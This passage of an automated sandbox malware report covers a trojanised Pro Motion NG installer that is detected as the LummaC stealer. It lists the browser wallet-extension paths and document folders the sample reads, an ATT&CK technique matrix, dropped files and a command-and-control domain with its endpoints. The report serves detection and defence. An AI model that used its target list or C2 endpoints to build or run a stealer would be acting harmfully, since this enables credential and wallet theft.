Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Source: Yara match

File source: Process Memory Space: ImBatch.exe PID: 1792, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\Outlook Files	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: ImBatch.exe PID: 1792, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	11 Peripheral Device Discovery	Remote Desktop Protocol	21 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Software Packing	NTDS	146 System Information Discovery	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	311 Security Software Discovery	SSH	12 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Masquerading	DCSync	11 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	12 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
promot_s.msi	11%	ReversingLabs
promot_s.msi	5%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ApiCore.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\DirectXTex.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\WinIMergeLib.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\cddbU.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\jpeg62.dll	5%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\pspiHost.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wPDFView03.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wp_type1ttf.dll	0%	ReversingLabs
C:\Windows\Installer\MSI3086.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3133.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3154.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3174.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI31B3.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3F22.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
treepledeeple.fun	0%	Virustotal	Browse
highmotionsoftware.com	0%	Virustotal	Browse
www.highmotionsoftware.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://treepledeeple.fun/api4	0%	Avira URL Cloud	safe
http://treepledeeple.fun/u	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/	0%	Virustotal		Browse
http://www.indyproject.org/	0%	Virustotal		Browse
https://www.highmotionsoftware.com/upd/imbatch/urlf	0%	Avira URL Cloud	safe
http://treepledeeple.fun/M~	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/download-center/imbatch	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/urln	0%	Avira URL Cloud	safe
http://www.eurekalog.com/help/eurekalog/internal_errors.phpEurekaLog	0%	Avira URL Cloud	safe
http://treepledeeple.fun/	0%	Avira URL Cloud	safe
http://treepledeeple.fun/	0%	Virustotal		Browse
http://www.indyproject.org/	0%	Avira URL Cloud	safe
http://treepledeeple.fun:80/api	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/version	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com05	0%	Avira URL Cloud	safe
http://treepledeeple.fun:80/api	0%	Virustotal		Browse
http://subca.ocsp-certum.com02	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/download-center/imbatch	0%	Virustotal		Browse
https://www.highmotionsoftware.com/upd/imbatch/version	0%	Virustotal		Browse
http://treepledeeple.fun/apill	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com01	0%	Avira URL Cloud	safe
http://treepledeeple.fun/apiyn=	0%	Avira URL Cloud	safe
http://treepledeeple.fun/apiknO	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/urlU	0%	Avira URL Cloud	safe
http://treepledeeple.fun/api	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/y	0%	Avira URL Cloud	safe
http://ccsca2021.ocsp-certum.com05	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/help/imbatch/filter_taskU	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/feedback/imbatch/f.php	0%	Avira URL Cloud	safe
http://treepledeeple.fun/apiYf(	0%	Avira URL Cloud	safe
http://treepledeeple.fun/t~	0%	Avira URL Cloud	safe
http://treepledeeple.fun/api	0%	Virustotal		Browse
http://treepledeeple.fun/on%	0%	Avira URL Cloud	safe
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	0%	Avira URL Cloud	safe
http://treepledeeple.fun/apiy	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/version5	0%	Avira URL Cloud	safe
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	0%	Virustotal		Browse
http://treepledeeple.fun/apit	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/imb_order.php?LangID=	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/ht	0%	Avira URL Cloud	safe
http://treepledeeple.fun/on5	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/url	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/url~	0%	Avira URL Cloud	safe
http://treepledeeple.fun/)~	0%	Avira URL Cloud	safe
https://www.highmotionsoftware.com/upd/imbatch/url	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bolidesoft.com	104.193.111.117	true	false		high
highmotionsoftware.com	104.193.111.101	true	false	0%, Virustotal, Browse	unknown
treepledeeple.fun	172.67.139.34	true	false	0%, Virustotal, Browse	unknown
www.bolidesoft.com	unknown	unknown	false		high
www.highmotionsoftware.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://treepledeeple.fun/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/upd/imbatch/version	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://treepledeeple.fun/api	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/upd/imbatch/url	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nginx.com/	ImBatch.exe, 00000003.00000003.341101707.0000000011A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.highmotionsoftware.com/upd/imbatch/urlf	ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctsca2021.crl0o	WinIMergeLib.dll.1.dr	false		high
https://duckduckgo.com/ac/?q=	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.highmotionsoftware.com/	ImBatch.exe, 00000003.00000002.439109500.00000000119F6000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nginx.org/	ImBatch.exe, 00000003.00000003.341101707.0000000011A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://treepledeeple.fun/u	ImBatch.exe, 00000003.00000003.341101707.00000000119D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s	WinIMergeLib.dll.1.dr	false		high
http://treepledeeple.fun/api4	ImBatch.exe, 00000003.00000002.439109500.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indyproject.org/	ImBatch.exe, 00000003.00000002.423018619.000000000108E000.00000020.00000001.01000000.00000003.sdmp, ImBatch.exe, 00000003.00000002.435094298.0000000005180000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://crowdin.com/project/imbatchU	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false		high
https://www.google.com/search?q=.net	ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://treepledeeple.fun/M~	ImBatch.exe, 00000003.00000003.356486958.0000000011A97000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011A98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.eurekalog.com/help/eurekalog/internal_errors.phpEurekaLog	ImBatch.exe, 00000003.00000002.419386742.00000000006F6000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/download-center/imbatch	ImBatch.exe, 00000003.00000002.435094298.0000000005180000.00000004.00001000.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.437214184.000000001043C000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/upd/imbatch/urln	ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.certum.pl/ccsca2021.cer0	WinIMergeLib.dll.1.dr	false		high
http://treepledeeple.fun:80/api	ImBatch.exe, 00000003.00000003.348965065.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.343818093.0000000011A56000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.351357276.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/chrome/	ImBatch.exe, 00000003.00000002.440238833.0000000014882000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	ImBatch.exe, 00000003.00000002.439109500.00000000119B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.highmotionsoftware.com/upd/imbatch/urlF	ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://repository.certum.pl/ctsca2021.cer0	WinIMergeLib.dll.1.dr	false		high
http://subca.ocsp-certum.com05	WinIMergeLib.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com02	WinIMergeLib.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	WinIMergeLib.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://treepledeeple.fun/apill	ImBatch.exe, 00000003.00000002.439109500.0000000011AFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://treepledeeple.fun/apiyn=	ImBatch.exe, 00000003.00000003.342487697.0000000011A12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	WinIMergeLib.dll.1.dr	false		high
http://repository.certum.pl/ctnca2.cer09	WinIMergeLib.dll.1.dr	false		high
http://treepledeeple.fun/apiknO	ImBatch.exe, 00000003.00000003.342487697.0000000011A12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/upd/imbatch/urlU	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/y	ImBatch.exe, 00000003.00000002.439109500.00000000119F6000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chromeGoogle	ImBatch.exe, 00000003.00000003.354382134.00000000148B0000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.440238833.000000001486A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ccsca2021.ocsp-certum.com05	WinIMergeLib.dll.1.dr	false	Avira URL Cloud: safe	unknown
https://www.bolidesoft.com/a/activate/activate.php?pid=110&kid=112&hw=	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.n	ImBatch.exe, 00000003.00000002.440238833.000000001486A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	WinIMergeLib.dll.1.dr	false		high
http://umich.edu/~shameem)	ImBatch.exe, 00000003.00000002.423471944.0000000001FEF000.00000002.00000001.01000000.00000003.sdmp	false		high
https://www.highmotionsoftware.com/help/imbatch/filter_taskU	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/feedback/imbatch/f.php	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://treepledeeple.fun/apiYf(	ImBatch.exe, 00000003.00000002.429735323.0000000002301000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://treepledeeple.fun/t~	ImBatch.exe, 00000003.00000003.356486958.0000000011A97000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bolidesoft.com/a/banner/check.php?pid=110&b=760&l=9&f=n&ab=%3Cclick%20to%20set%20your%20	ImBatch.exe, 00000003.00000002.434496945.000000000505E000.00000004.00001000.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	WinIMergeLib.dll.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.aiim.org/pdfa/ns/id/	ImBatch.exe, ImBatch.exe, 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp	false		high
http://crl.certum.pl/ctnca.crl0k	WinIMergeLib.dll.1.dr	false		high
http://treepledeeple.fun/on%	ImBatch.exe, 00000003.00000003.342487697.00000000119F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://treepledeeple.fun/apiy	ImBatch.exe, 00000003.00000003.348965065.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.351357276.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.352521233.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.highmotionsoftware.com/upd/imbatch/version5	ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://treepledeeple.fun/apit	ImBatch.exe, 00000003.00000003.357592977.0000000011B00000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.356426905.0000000011B00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.highmotionsoftware.com/imb_order.php?LangID=	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.highmotionsoftware.com/ht	ImBatch.exe, 00000003.00000002.429735323.0000000002234000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.certum.pl/CPS0	WinIMergeLib.dll.1.dr	false		high
https://www.ecosia.org/newtab/	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/winmerge/winimergeB	WinIMergeLib.dll.1.dr	false		high
https://www.bolidesoft.com/a/banner/check.php?pid=110&b=	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false		high
http://treepledeeple.fun/on5	ImBatch.exe, 00000003.00000003.342487697.00000000119F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfp	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/Google	ImBatch.exe, 00000003.00000003.354382134.00000000148B0000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.440238833.000000001486A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/chrome	ImBatch.exe, 00000003.00000002.440238833.0000000014882000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.highmotionsoftware.com/upd/imbatch/url~	ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bolidesoft.com	ImBatch.exe, 00000003.00000002.435094298.0000000005180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://treepledeeple.fun/)~	ImBatch.exe, 00000003.00000002.439109500.0000000011A98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imagemagick.org/script/download.php#windowsopen	ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.139.34	treepledeeple.fun	United States	13335	CLOUDFLARENETUS	false
104.193.111.117	bolidesoft.com	United States	63410	PRIVATESYSTEMSUS	false
104.193.111.101	highmotionsoftware.com	United States	63410	PRIVATESYSTEMSUS	false
104.21.87.11	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1308846
Start date and time:	2023-09-15 11:22:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	promot_s.msi
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winMSI@6/46@39/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 209.197.3.8, 8.252.161.126, 8.248.153.254, 8.247.112.254, 8.252.159.126, 8.253.131.120, 142.251.33.174
Excluded domains from analysis (whitelisted): www.bing.com, fg.download.windowsupdate.com.c.footprint.net, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, tse1.mm.bing.net, ctldl.windowsupdate.com, crl3.digicert.com, cds.d2s7q6s2.hwcdn.net, arc.msn.com, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, www.google-analytics.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:23:04	API Interceptor	1x Sleep call for process: msiexec.exe modified
